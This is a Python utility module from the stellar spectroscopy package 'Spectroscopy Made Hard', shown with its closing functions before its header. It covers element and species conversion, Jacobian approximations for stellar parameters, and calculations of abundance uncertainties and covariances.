wb = np.sum(sigma_tilde_inv, axis=0)
assert np.allclose(w,wb,rtol=1e-6), "Problem in species {:.1f}, Nline={}, e_sys={:.2f}".format(species, len(t), s)
tab["weight"][ix] = w
for col in tab.colnames:
if col in ["index", "wavelength", "species", "loggf", "star"]: continue
tab[col].format = ".3f"
return tab
def process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY):
"""
Computes the following
Var([X/Fe]) = Var(X) + Var(Fe) - 2 Cov(X, Fe)
Does *not* compute covariances, but you can do that this way:
Cov([X/Fe], [Fe/H]) = Cov(X,Fe) - Cov(Fe, Fe)
"""
# [X/Fe] errors are the Fe1 and Fe2 parts of the covariance matrix
try:
ix1 = np.where(summary_tab["species"]==26.0)[0][0]
except IndexError:
print("No feh1: setting to nan")
feh1 = np.nan
exfe1 = np.nan
else:
feh1 = summary_tab["[X/H]"][ix1]
var_fe1 = var_X[ix1]
# Var(X/Fe1) = Var(X) + Var(Fe1) - 2*Cov(X,Fe1)
exfe1 = np.sqrt(var_X + var_fe1 - 2*cov_XY[ix1,:])
try:
ix2 = np.where(summary_tab["species"]==26.1)[0][0]
except IndexError:
print("No feh2: setting to feh1")
feh2 = feh1
try:
exfe2 = np.sqrt(var_X[ix1])
except UnboundLocalError: # no ix1 either
exfe2 = np.nan
else:
feh2 = summary_tab["[X/H]"][ix2]
var_fe2 = var_X[ix2]
# Var(X/Fe2) = Var(X) + Var(Fe2) - 2*Cov(X,Fe2)
exfe2 = np.sqrt(var_X + var_fe2 - 2*cov_XY[ix2,:])
return feh1, exfe1, feh2, exfe2
def process_session_uncertainties_abundancesummary(tab, rhomat):
"""
Take a table of lines and turn them into standard abundance table
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
from .photospheres.abundances import asplund_2009 as solar_composition
unique_species = np.unique(tab["species"])
cols = ["species","elem","N",
"logeps","sigma","stderr",
"logeps_w","sigma_w","stderr_w",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_Teff_w","e_logg_w","e_vt_w","e_MH_w","e_sys_w",
"[X/H]","e_XH","s_X"]
data = OrderedDict(zip(cols, [[] for col in cols]))
for species in unique_species:
ttab = tab[tab["species"]==species]
elem = species_to_element(species)
N = len(ttab)
logeps = np.mean(ttab["logeps"])
stdev = np.std(ttab["logeps"])
stderr = stdev/np.sqrt(N)
w = ttab["weight"]
finite = np.isfinite(w)
if finite.sum() != N:
print("WARNING: species {:.1f} N={} != finite weights {}".format(species, N, finite.sum()))
x = ttab["logeps"]
logeps_w = np.sum(w*x)/np.sum(w)
stdev_w = np.sqrt(np.sum(w*(x-logeps_w)**2)/np.sum(w))
stderr_w = np.sqrt(1/np.sum(w))
sperrs = []
sperrs_w = []
for spcol in ["Teff","logg","vt","MH"]:
x_new = x + ttab["e_"+spcol]
e_sp = np.mean(x_new) - logeps
sperrs.append(e_sp)
#e_sp_w = np.sum(w*x_new)/np.sum(w) - logeps_w
e_sp_w = np.sum(w*ttab["e_"+spcol])/np.sum(w)
sperrs_w.append(e_sp_w)
sperrs = np.array(sperrs)
sperrs_w = np.array(sperrs_w)
sperrtot = np.sqrt(sperrs.T.dot(rhomat.dot(sperrs)))
sperrtot_w = np.sqrt(sperrs_w.T.dot(rhomat.dot(sperrs_w)))
XH = logeps_w - solar_composition(species)
#e_XH = np.sqrt(stderr_w**2 + sperrtot_w**2)
e_XH = stderr_w
s_X = ttab["e_sys"][0]
assert np.allclose(ttab["e_sys"], s_X), s_X
input_data = [species, elem, N,
logeps, stdev, stderr,
logeps_w, stdev_w, stderr_w,
sperrs[0], sperrs[1], sperrs[2], sperrs[3], sperrtot,
sperrs_w[0], sperrs_w[1], sperrs_w[2], sperrs_w[3], sperrtot_w,
XH, e_XH, s_X
]
assert len(cols) == len(input_data)
for col, x in zip(cols, input_data):
data[col].append(x)
summary_tab = astropy.table.Table(data)
## Add in [X/Fe]
var_X, cov_XY = process_session_uncertainties_covariance(summary_tab, rhomat)
feh1, efe1, feh2, efe2 = process_session_uncertainties_calc_xfe_errors(summary_tab, var_X, cov_XY)
if len(summary_tab["[X/H]"]) > 0:
summary_tab["[X/Fe1]"] = summary_tab["[X/H]"] - feh1
summary_tab["e_XFe1"] = efe1
summary_tab["[X/Fe2]"] = summary_tab["[X/H]"] - feh2
summary_tab["e_XFe2"] = efe2
ixion = np.array([x - int(x) > .01 for x in summary_tab["species"]])
summary_tab["[X/Fe]"] = summary_tab["[X/Fe1]"]
summary_tab["e_XFe"] = summary_tab["e_XFe1"]
summary_tab["[X/Fe]"][ixion] = summary_tab["[X/Fe2]"][ixion]
summary_tab["e_XFe"][ixion] = summary_tab["e_XFe2"][ixion]
for col in summary_tab.colnames:
if col=="N" or col=="species" or col=="elem": continue
summary_tab[col].format = ".3f"
else:
for col in ["[X/Fe]","[X/Fe1]","[X/Fe2]",
"e_XFe","e_XFe1","e_XFe2"]:
summary_tab.add_column(astropy.table.Column(np.zeros(0),col))
#summary_tab[col] = np.nan #.add_column(col)
return summary_tab
def process_session_uncertainties(session,
rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
"""
After you have run session.compute_all_abundance_uncertainties(),
this pulls out a big array of line data
and computes the final abundance table and errors
By default assumes no correlations in stellar parameters. If you specify rho_XY
it will include that correlated error.
(X,Y) in [T, g, v, M]
"""
## Correlation matrix. This is multiplied by the errors to get the covariance matrix.
# rho order = [T, g, v, M]
rhomat = _make_rhomat(rho_Tg, rho_Tv, rho_TM, rho_gv, rho_gM, rho_vM)
## Make line measurement table (no upper limits yet)
tab = process_session_uncertainties_lines(session, rhomat)
## Summarize measurements
summary_tab = process_session_uncertainties_abundancesummary(tab, rhomat)
## Add upper limits
tab, summary_tab = process_session_uncertainties_limits(session, tab, summary_tab, rhomat)
return tab, summary_tab
def get_synth_eqw(model, window=1.0, wavelength=None,
get_spec=False):
"""
Calculate the equivalent width associated with the synthetic line.
This is done by synthesizing the line in absence of any other elements,
then integrating the synthetic spectrum in a window around the central wavelength.
The user can specify the size of the window (default +/-1A)
and the central wavelength (default None -> model.wavelength)
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
assert isinstance(model, SpectralSynthesisModel)
assert len(model.elements)==1, model.elements
abundances = model.metadata["rt_abundances"].copy()
for key in abundances:
if key != model.elements[0]: abundances[key] = -9.0
abundances[model.elements[0]] = model.metadata["fitted_result"][0].values()[0]
print(abundances)
synth_dispersion, intensities, meta = model.session.rt.synthesize(
model.session.stellar_photosphere, model.transitions,
abundances,
isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
if wavelength is None: wavelength = model.wavelength
ii = (synth_dispersion > wavelength - window) & (synth_dispersion < wavelength + window)
# integrate with the trapezoid rule, get milliangstroms
eqw = 1000.*integrate.trapz(1.0-intensities[ii], synth_dispersion[ii])
# integrate everything with the trapezoid rule, get milliangstroms
eqw_all = 1000.*integrate.trapz(1.0-intensities, synth_dispersion)
for key in abundances:
abundances[key] = -9.0
blank_dispersion, blank_flux, blank_meta = model.session.rt.synthesize(
model.session.stellar_photosphere, model.transitions,
abundances,
isotopes=model.session.metadata["isotopes"], twd=model.session.twd)[0]
blank_eqw = 1000.*integrate.trapz(1.0-blank_flux[ii], blank_dispersion[ii])
# integrate everything with the trapezoid rule, get milliangstroms
blank_eqw_all = 1000.*integrate.trapz(1.0-blank_flux, blank_dispersion)
if get_spec:
return eqw, eqw_all, blank_eqw, blank_eqw_all, synth_dispersion, intensities
return eqw, eqw_all, blank_eqw, blank_eqw_all
| 39.978282 | 133 | 0.593486 | # coding: utf-8
""" Utility functions for Spectroscopy Made Hard """
__author__ = "Andy Casey <andy@astrowizici.st>"
# Standard library
import os
import logging
import platform
import string
import sys
import traceback
import tempfile
from six import string_types
from collections import Counter, OrderedDict
try:
from subprocess import getstatusoutput
except ImportError: # python 2
from commands import getstatusoutput
from hashlib import sha1 as sha
from random import choice
from socket import gethostname, gethostbyname
# Third party imports
import numpy as np
import astropy.table
from scipy import stats, integrate, optimize
common_molecule_name2Z = {
'Mg-H': 12,'H-Mg': 12,
'C-C': 6,
'C-N': 7, 'N-C': 7, #TODO
'C-H': 6, 'H-C': 6,
'O-H': 8, 'H-O': 8,
'Fe-H': 26,'H-Fe': 26,
'N-H': 7, 'H-N': 7,
'Si-H': 14,'H-Si': 14,
'Ti-O': 22,'O-Ti': 22,
'V-O': 23,'O-V': 23,
'Zr-O': 40,'O-Zr': 40
}
common_molecule_name2species = {
'Mg-H': 112,'H-Mg': 112,
'C-C': 606,
'C-N': 607,'N-C': 607,
'C-H': 106,'H-C': 106,
'O-H': 108,'H-O': 108,
'Fe-H': 126,'H-Fe': 126,
'N-H': 107,'H-N': 107,
'Si-H': 114,'H-Si': 114,
'Ti-O': 822,'O-Ti': 822,
'V-O': 823,'O-V': 823,
'Zr-O': 840,'O-Zr': 840
}
common_molecule_species2elems = {
112: ["Mg", "H"],
606: ["C", "C"],
607: ["C", "N"],
106: ["C", "H"],
108: ["O", "H"],
126: ["Fe", "H"],
107: ["N", "H"],
114: ["Si", "H"],
822: ["Ti", "O"],
823: ["V", "O"],
840: ["Zr", "O"]
}
__all__ = ["element_to_species", "element_to_atomic_number", "species_to_element", "get_common_letters", \
"elems_isotopes_ion_to_species", "species_to_elems_isotopes_ion", \
"find_common_start", "extend_limits", "get_version", \
"approximate_stellar_jacobian", "approximate_sun_hermes_jacobian",\
"hashed_id"]
logger = logging.getLogger(__name__)
def mkdtemp(**kwargs):
if not os.path.exists(os.environ["HOME"]+"/.smh"):
logger.info("Making "+os.environ["HOME"]+"/.smh")
os.mkdir(os.environ["HOME"]+"/.smh")
if 'dir' not in kwargs:
kwargs['dir'] = os.environ["HOME"]+"/.smh"
return tempfile.mkdtemp(**kwargs)
def mkstemp(**kwargs):
if not os.path.exists(os.environ["HOME"]+"/.smh"):
logger.info("Making "+os.environ["HOME"]+"/.smh")
os.mkdir(os.environ["HOME"]+"/.smh")
if 'dir' not in kwargs:
kwargs['dir'] = os.environ["HOME"]+"/.smh"
return tempfile.mkstemp(**kwargs)
def random_string(N=10):
return ''.join(choice(string.ascii_uppercase + string.digits) for _ in range(N))
def equilibrium_state(transitions, columns=("expot", "rew"), group_by="species",
ycolumn="abundance", yerr_column=None):
"""
Perform linear fits to the abundances provided in the transitions table
with respect to x-columns.
:param transitions:
A table of atomic transitions with measured equivalent widths and
abundances.
:param columns: [optional]
The names of the columns to make fits against.
:param group_by: [optional]
The name of the column in `transitions` to calculate states.
"""
lines = {}
transitions = transitions.group_by(group_by)
for i, start_index in enumerate(transitions.groups.indices[:-1]):
end_index = transitions.groups.indices[i + 1]
# Do excitation potential first.
group_lines = {}
for x_column in columns:
x = transitions[x_column][start_index:end_index]
y = transitions["abundance"][start_index:end_index]
if yerr_column is not None:
try:
yerr = transitions[yerr_column][start_index:end_index]
except KeyError:
logger.exception("Cannot find yerr column '{}':".format(
yerr_column))
yerr = np.ones(len(y))
else:
yerr = np.ones(len(y))
# Only use finite values.
finite = np.isfinite(x * y * yerr)
try: # fix for masked arrays
finite = finite.filled(False)
except:
pass
if not np.any(finite):
#group_lines[x_column] = (np.nan, np.nan, np.nan, np.nan, 0)
continue
m, b, medy, stdy, stdm, N = fit_line(x, y, None)
group_lines[x_column] = (m, b, medy, (stdy, stdm), N)
# x, y, yerr = np.array(x[finite]), np.array(y[finite]), np.array(yerr[finite])
#
# # Let's remove the covariance between m and b by making the mean of x = 0
# xbar = np.mean(x)
# x = x - xbar
# # y = mx+b = m(x-xbar) + (b+m*xbar), so m is unchanged but b is shifted.
#
## A = np.vstack((np.ones_like(x), x)).T
## C = np.diag(yerr**2)
## try:
## cov = np.linalg.inv(np.dot(A.T, np.linalg.solve(C, A)))
## b, m = np.dot(cov, np.dot(A.T, np.linalg.solve(C, y)))
##
## except np.linalg.LinAlgError:
## #group_lines[x_column] \
## # = (np.nan, np.nan, np.median(y), np.std(y), len(x))
## None
##
## else:
## #group_lines[x_column] = (m, b, np.median(y), (np.std(y), np.sqrt(cov[1,1])), len(x))
## group_lines[x_column] = (m, b+m*xbar, np.median(y), (np.std(y), np.sqrt(cov[1,1])), len(x))
# m, b, r, p, m_stderr = stats.linregress(x, y)
# group_lines[x_column] = (m, b-m*xbar, np.median(y), (np.std(y), m_stderr), len(x))
identifier = transitions[group_by][start_index]
if group_lines:
lines[identifier] = group_lines
return lines
def fit_line(x, y, yerr=None):
if yerr is not None: raise NotImplementedError("Does not fit with error bars yet")
finite = np.isfinite(x) & np.isfinite(y)
if finite.sum()==0:
return np.nan, np.nan, np.nan, np.nan, np.nan, 0
x, y = x[finite], y[finite]
xbar = np.mean(x)
x = x - xbar
m, b_bar, r, p, m_stderr = stats.linregress(x, y)
b = b_bar - m*xbar
return m, b, np.median(y), np.std(y), m_stderr, len(x)
def spectral_model_conflicts(spectral_models, line_list):
"""
Identify abundance conflicts in a list of spectral models.
:param spectral_models:
A list of spectral models to check for conflicts.
:param line_list:
A table of energy transitions.
:returns:
A list containing tuples of spectral model indices where there is a
conflict about which spectral model to use for the determination of
stellar parameters and/or composition.
"""
line_list_hashes = line_list.compute_hashes()
transition_hashes = {}
for i, spectral_model in enumerate(spectral_models):
for transition in spectral_model.transitions:
transition_hash = line_list.hash(transition)
transition_hashes.setdefault(transition_hash, [])
transition_hashes[transition_hash].append(i)
# Which of the transition_hashes appear more than once?
conflicts = []
for transition_hash, indices in transition_hashes.iteritems():
if len(indices) < 2: continue
# OK, what element is this transition?
match = (line_list_hashes == transition_hash)
element = line_list["element"][match][0].split()[0]
# Of the spectral models that use this spectral hash, what are they
# measuring?
conflict_indices = []
for index in indices:
if element not in spectral_models[index].metadata["elements"]:
# This transition is not being measured in this spectral model.
continue
else:
# This spectral model is modeling this transition.
# Does it say this should be used for the determination of
# stellar parameters or composition?
if spectral_models[index].use_for_stellar_parameter_inference \
or spectral_models[index].use_for_stellar_composition_inference:
conflict_indices.append(index)
if len(conflict_indices) > 1:
conflicts.append(conflict_indices)
return conflicts
# List the periodic table here so that we can use it outside of a single
# function scope (e.g., 'element in utils.periodic_table')
periodic_table = """H He
Li Be B C N O F Ne
Na Mg Al Si P S Cl Ar
K Ca Sc Ti V Cr Mn Fe Co Ni Cu Zn Ga Ge As Se Br Kr
Rb Sr Y Zr Nb Mo Tc Ru Rh Pd Ag Cd In Sn Sb Te I Xe
Cs Ba Lu Hf Ta W Re Os Ir Pt Au Hg Tl Pb Bi Po At Rn
Fr Ra Lr Rf"""
lanthanoids = "La Ce Pr Nd Pm Sm Eu Gd Tb Dy Ho Er Tm Yb"
actinoids = "Ac Th Pa U Np Pu Am Cm Bk Cf Es Fm Md No"
periodic_table = periodic_table.replace(" Ba ", " Ba " + lanthanoids + " ") \
.replace(" Ra ", " Ra " + actinoids + " ").split()
del actinoids, lanthanoids
def hashed_id():
try:
salt = getstatusoutput("git config --get user.name")[1]
except:
import uuid
salt = uuid.uuid3(uuid.NAMESPACE_DNS, "")
return sha(salt.encode("utf-8")).hexdigest()
hashed_id = hashed_id()
def approximate_stellar_jacobian(stellar_parameters, *args):
""" Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations from the Sun """
logger.info("Updated approximation of the Jacobian")
teff, vt, logg, feh = stellar_parameters[:4]
# This is the black magic.
full_jacobian = np.array([
[ 5.4393e-08*teff - 4.8623e-04, -7.2560e-02*vt + 1.2853e-01, 1.6258e-02*logg - 8.2654e-02, 1.0897e-02*feh - 2.3837e-02],
[ 4.2613e-08*teff - 4.2039e-04, -4.3985e-01*vt + 8.0592e-02, -5.7948e-02*logg - 1.2402e-01, -1.1533e-01*feh - 9.2341e-02],
[-3.2710e-08*teff + 2.8178e-04, 3.8185e-03*vt - 1.6601e-02, -1.2006e-02*logg - 3.5816e-03, -2.8592e-05*feh + 1.4257e-03],
[-1.7822e-08*teff + 1.8250e-04, 3.5564e-02*vt - 1.1024e-01, -1.2114e-02*logg + 4.1779e-02, -1.8847e-02*feh - 1.0949e-01]
])
return full_jacobian.T
def approximate_sun_hermes_jacobian(stellar_parameters, *args):
"""
Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations using the Sun
and the HERMES atomic line list, after equivalent widths
were carefully inspected.
"""
# logger.info("Updated approximation of the Jacobian")
teff, vt, logg, feh = stellar_parameters[:4]
# full_jacobian = np.array([
# [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
# [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
# [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
# [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
# ])
# After culling abundance outliers,..
full_jacobian = np.array([
[ 4.5143e-08*teff - 4.3018e-04, -6.4264e-04*vt + 2.4581e-02, 1.7168e-02*logg - 5.3255e-02, 1.1205e-02*feh - 7.3342e-03],
[-1.0055e-07*teff + 7.5583e-04, 5.0811e-02*vt - 3.1919e-01, -6.7963e-02*logg + 7.3189e-02, -4.1335e-02*feh - 6.0225e-02],
[-1.9097e-08*teff + 1.8040e-04, -3.8736e-03*vt + 7.6987e-03, -6.4754e-03*logg - 2.0095e-02, -4.1837e-03*feh - 4.1084e-03],
[-7.3958e-09*teff + 1.0175e-04, 6.5783e-03*vt - 3.6509e-02, -9.7692e-03*logg + 3.2322e-02, -1.7391e-02*feh - 1.0502e-01]
])
return full_jacobian.T
def approximate_stellar_jacobian_2(stellar_parameters, *args):
""" Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations from the Sun """
logger.info("Updated approximation of the Jacobian {}".format(stellar_parameters))
teff, logg, vt, feh = stellar_parameters[:4]
#if np.isnan(teff): teff = 5000.; logger.info("jacobian: teff=nan->5000")
#if np.isnan(logg): logg = 2.0; logger.info("jacobian: logg=nan->2.0")
#if np.isnan(vt): vt = 1.75; logger.info("jacobian: vt=nan->1.75")
#if np.isnan(feh): feh = -2.0; logger.info("jacobian: feh=nan->-2.0")
# This is the black magic.
full_jacobian = np.array([
[ 5.4393e-08*teff - 4.8623e-04, 1.6258e-02*logg - 8.2654e-02, -7.2560e-02*vt + 1.2853e-01, 1.0897e-02*feh - 2.3837e-02],
[ 4.2613e-08*teff - 4.2039e-04, -5.7948e-02*logg - 1.2402e-01, -4.3985e-01*vt + 8.0592e-02, -1.1533e-01*feh - 9.2341e-02],
[-3.2710e-08*teff + 2.8178e-04, -1.2006e-02*logg - 3.5816e-03, 3.8185e-03*vt - 1.6601e-02, -2.8592e-05*feh + 1.4257e-03],
[-1.7822e-08*teff + 1.8250e-04, -1.2114e-02*logg + 4.1779e-02, 3.5564e-02*vt - 1.1024e-01, -1.8847e-02*feh - 1.0949e-01]
])
return full_jacobian.T
def approximate_sun_hermes_jacobian_2(stellar_parameters, *args):
"""
Approximate the Jacobian of the stellar parameters and
minimisation parameters, based on calculations using the Sun
and the HERMES atomic line list, after equivalent widths
were carefully inspected.
"""
# logger.info("Updated approximation of the Jacobian")
teff, logg, vt, feh = stellar_parameters[:4]
# full_jacobian = np.array([
# [ 4.4973e-08*teff - 4.2747e-04, -1.2404e-03*vt + 2.4748e-02, 1.6481e-02*logg - 5.1979e-02, 1.0470e-02*feh - 8.5645e-03],
# [-9.3371e-08*teff + 6.9953e-04, 5.0115e-02*vt - 3.0106e-01, -6.0800e-02*logg + 6.7056e-02, -4.1281e-02*feh - 6.2085e-02],
# [-2.1326e-08*teff + 1.9121e-04, 1.0508e-03*vt + 1.1099e-03, -6.1479e-03*logg - 1.7401e-02, 3.4172e-03*feh + 3.7851e-03],
# [-9.4547e-09*teff + 1.1280e-04, 1.0033e-02*vt - 3.6439e-02, -9.5015e-03*logg + 3.2700e-02, -1.7947e-02*feh - 1.0383e-01]
# ])
# After culling abundance outliers,..
full_jacobian = np.array([
[ 4.5143e-08*teff - 4.3018e-04, 1.7168e-02*logg - 5.3255e-02, -6.4264e-04*vt + 2.4581e-02, 1.1205e-02*feh - 7.3342e-03],
[-1.0055e-07*teff + 7.5583e-04, -6.7963e-02*logg + 7.3189e-02, 5.0811e-02*vt - 3.1919e-01, -4.1335e-02*feh - 6.0225e-02],
[-1.9097e-08*teff + 1.8040e-04, -6.4754e-03*logg - 2.0095e-02, -3.8736e-03*vt + 7.6987e-03, -4.1837e-03*feh - 4.1084e-03],
[-7.3958e-09*teff + 1.0175e-04, -9.7692e-03*logg + 3.2322e-02, 6.5783e-03*vt - 3.6509e-02, -1.7391e-02*feh - 1.0502e-01]
])
return full_jacobian.T
def element_to_species(element_repr):
""" Converts a string representation of an element and its ionization state
to a floating point """
if not isinstance(element_repr, string_types):
raise TypeError("element must be represented by a string-type")
if element_repr.count(" ") > 0:
element, ionization = element_repr.split()[:2]
else:
element, ionization = element_repr, "I"
if element not in periodic_table:
try:
return common_molecule_name2species[element]
except KeyError:
# Don't know what this element is
return float(element_repr)
ionization = max([0, ionization.upper().count("I") - 1]) /10.
transition = periodic_table.index(element) + 1 + ionization
return transition
def element_to_atomic_number(element_repr):
"""
Converts a string representation of an element and its ionization state
to a floating point.
:param element_repr:
A string representation of the element. Typical examples might be 'Fe',
'Ti I', 'si'.
"""
if not isinstance(element_repr, string_types):
raise TypeError("element must be represented by a string-type")
element = element_repr.title().strip().split()[0]
try:
index = periodic_table.index(element)
except IndexError:
raise ValueError("unrecognized element '{}'".format(element_repr))
except ValueError:
try:
return common_molecule_name2Z[element]
except KeyError:
raise ValueError("unrecognized element '{}'".format(element_repr))
return 1 + index
def species_to_element(species):
""" Converts a floating point representation of a species to a string
representation of the element and its ionization state """
if not isinstance(species, (float, int)):
raise TypeError("species must be represented by a floating point-type")
if round(species,1) != species:
# Then you have isotopes, but we will ignore that
species = int(species*10)/10.
if species + 1 >= len(periodic_table) or 1 > species:
# Don"t know what this element is. It"s probably a molecule.
try:
elems = common_molecule_species2elems[species]
return "-".join(elems)
except KeyError:
# No idea
return str(species)
atomic_number = int(species)
element = periodic_table[int(species) - 1]
ionization = int(round(10 * (species - int(species)) + 1))
# The special cases
if element in ("C", "H", "He"): return element
return "%s %s" % (element, "I" * ionization)
def elems_isotopes_ion_to_species(elem1,elem2,isotope1,isotope2,ion):
Z1 = int(element_to_species(elem1.strip()))
if isotope1==0: isotope1=''
else: isotope1 = str(isotope1).zfill(2)
if elem2.strip()=='': # Atom
mystr = "{}.{}{}".format(Z1,int(ion-1),isotope1)
else: # Molecule
#assert ion==1,ion
Z2 = int(element_to_species(elem2.strip()))
# If one isotope is specified but the other isn't, use a default mass
# These masses are taken from MOOG for Z=1 to 95
amu = [1.008,4.003,6.941,9.012,10.81,12.01,14.01,16.00,19.00,20.18,
22.99,24.31,26.98,28.08,30.97,32.06,35.45,39.95,39.10,40.08,
44.96,47.90,50.94,52.00,54.94,55.85,58.93,58.71,63.55,65.37,
69.72,72.59,74.92,78.96,79.90,83.80,85.47,87.62,88.91,91.22,
92.91,95.94,98.91,101.1,102.9,106.4,107.9,112.4,114.8,118.7,
121.8,127.6,126.9,131.3,132.9,137.3,138.9,140.1,140.9,144.2,
145.0,150.4,152.0,157.3,158.9,162.5,164.9,167.3,168.9,173.0,
175.0,178.5,181.0,183.9,186.2,190.2,192.2,195.1,197.0,200.6,
204.4,207.2,209.0,210.0,210.0,222.0,223.0,226.0,227.0,232.0,
231.0,238.0,237.0,244.0,243.0]
amu = [int(round(x,0)) for x in amu]
if isotope1 == '':
if isotope2 == 0:
isotope2 = ''
else:
isotope1 = str(amu[Z1-1]).zfill(2)
else:
if isotope2 == 0:
isotope2 = str(amu[Z2-1]).zfill(2)
else:
isotope2 = str(isotope2).zfill(2)
# Swap if needed
if Z1 < Z2:
mystr = "{}{:02}.{}{}{}".format(Z1,Z2,int(ion-1),isotope1,isotope2)
else:
mystr = "{}{:02}.{}{}{}".format(Z2,Z1,int(ion-1),isotope2,isotope1)
return float(mystr)
def species_to_elems_isotopes_ion(species):
element = species_to_element(species)
if species >= 100:
# Molecule
Z1 = int(species/100)
Z2 = int(species - Z1*100)
elem1 = species_to_element(Z1).split()[0]
elem2 = species_to_element(Z2).split()[0]
# All molecules that we use are unionized
ion = 1
if species == round(species,1):
# No isotope specified
isotope1 = 0
isotope2 = 0
else: #Both isotopes need to be specified!
isotope1 = int(species*1000) - int(species*10)*100
isotope2 = int(species*100000) - int(species*1000)*100
if isotope1 == 0 or isotope2 == 0:
raise ValueError("molecule species must have both isotopes specified: {} -> {} {}".format(species,isotope1,isotope2))
# Swap if needed
else:
# Element
try:
elem1,_ion = element.split()
except ValueError as e:
if element == 'C':
elem1,_ion = 'C','I'
elif element == 'H':
elem1,_ion = 'H','I'
elif element == 'He':
elem1,_ion = 'He','I'
else:
print(element)
raise e
ion = len(_ion)
assert _ion == 'I'*ion, "{}; {}".format(_ion,ion)
if species == round(species,1):
isotope1 = 0
elif species == round(species,4):
isotope1 = int(species*10000) - int(species*10)*1000
elif species == round(species,3):
isotope1 = int(species*1000) - int(species*10)*100
else:
raise ValueError("problem determining isotope: {}".format(species))
elem2 = ''
isotope2 = 0
return elem1,elem2,isotope1,isotope2,ion
def get_common_letters(strlist):
return "".join([x[0] for x in zip(*strlist) \
if reduce(lambda a,b:(a == b) and a or None,x)])
def find_common_start(strlist):
strlist = strlist[:]
prev = None
while True:
common = get_common_letters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return get_common_letters(strlist)
def extend_limits(values, fraction=0.10, tolerance=1e-2):
""" Extend the values of a list by a fractional amount """
values = np.array(values)
finite_indices = np.isfinite(values)
if np.sum(finite_indices) == 0:
raise ValueError("no finite values provided")
lower_limit, upper_limit = np.min(values[finite_indices]), np.max(values[finite_indices])
ptp_value = np.ptp([lower_limit, upper_limit])
new_limits = lower_limit - fraction * ptp_value, ptp_value * fraction + upper_limit
if np.abs(new_limits[0] - new_limits[1]) < tolerance:
if np.abs(new_limits[0]) < tolerance:
# Arbitrary limits, since we"ve just been passed zeros
offset = 1
else:
offset = np.abs(new_limits[0]) * fraction
new_limits = new_limits[0] - offset, offset + new_limits[0]
return np.array(new_limits)
def get_version():
""" Retrieves the version of Spectroscopy Made Hard based on the
git version """
if getstatusoutput("which git")[0] == 0:
git_commands = ("git rev-parse --abbrev-ref HEAD", "git log --pretty=format:'%h' -n 1")
return "0.1dev:" + ":".join([getstatusoutput(command)[1] for command in git_commands])
else:
return "Unknown"
def struct2array(x):
""" Convert numpy structured array of simple type to normal numpy array """
Ncol = len(x.dtype)
type = x.dtype[0].type
assert np.all([x.dtype[i].type == type for i in range(Ncol)])
return x.view(type).reshape((-1,Ncol))
def _make_rhomat(rho_Tg=0.0, rho_Tv=0.0, rho_TM=0.0, rho_gv=0.0, rho_gM=0.0, rho_vM=0.0):
rhomat = np.array([[1.0, rho_Tg, rho_Tv, rho_TM],
[rho_Tg, 1.0, rho_gv, rho_gM],
[rho_Tv, rho_gv, 1.0, rho_vM],
[rho_TM, rho_gM, rho_vM, 1.0]])
return rhomat
def process_session_uncertainties_lines(session, rhomat, minerr=0.001):
"""
Using Sergey's estimator
"""
from .spectral_models import ProfileFittingModel, SpectralSynthesisModel
from .photospheres.abundances import asplund_2009 as solar_composition
cols = ["index","wavelength","species","expot","loggf",
"logeps","e_stat","eqw","e_eqw","fwhm",
"e_Teff","e_logg","e_vt","e_MH","e_sys",
"e_tot","weight"]
data = OrderedDict(zip(cols, [[] for col in cols]))
for i, model in enumerate(session.spectral_models):
if not model.is_acceptable: continue
if model.is_upper_limit: continue
wavelength = model.wavelength
species = np.ravel(model.species)[0]
expot = model.expot
loggf = model.loggf
if np.isnan(expot) or np.isnan(loggf):
print(i, species, model.expot, model.loggf)
try:
logeps = model.abundances[0]
staterr = model.metadata["1_sigma_abundance_error"]
if isinstance(model, SpectralSynthesisModel):
(named_p_opt, cov, meta) = model.metadata["fitted_result"]
if np.isfinite(cov[0,0]**0.5):
staterr = max(staterr, cov[0,0]**0.5)
assert ~np.isnan(staterr)
# apply minimum
staterr = np.sqrt(staterr**2 + minerr**2)
sperrdict = model.metadata["systematic_stellar_parameter_abundance_error"]
e_Teff = sperrdict["effective_temperature"]
e_logg = sperrdict["surface_gravity"]
e_vt = sperrdict["microturbulence"]
e_MH = sperrdict["metallicity"]
e_all = np.array([e_Teff, e_logg, e_vt, e_MH])
syserr_sq = e_all.T.dot(rhomat.dot(e_all))
syserr = np.sqrt(syserr_sq)
fwhm = model.fwhm
except Exception as e:
print("ERROR!!!")
print(i, species, model.wavelength)
print("Exception:",e)
logeps, staterr, e_Teff, e_logg, e_vt, e_MH, syserr = np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan
if isinstance(model, ProfileFittingModel):
eqw = model.equivalent_width or np.nan
e_eqw = model.equivalent_width_uncertainty or np.nan
else:
eqw = -999
e_eqw = -999
#toterr = np.sqrt(staterr**2 + syserr**2)
input_data = [i, wavelength, species, expot, loggf,
logeps, staterr, eqw, e_eqw, fwhm,
e_Teff, e_logg, e_vt, e_MH, syserr,
np.nan, np.nan]
for col, x in zip(cols, input_data):
data[col].append(x)
tab = astropy.table.Table(data)
# Calculate systematic error and effective weights for each species
tab["e_sys"] = np.nan
for species in np.unique(tab["species"]):
ix = np.where(tab["species"]==species)[0]
t = tab[ix]
# Estimate systematic error s
s = s_old = 0.
s_max = 2.
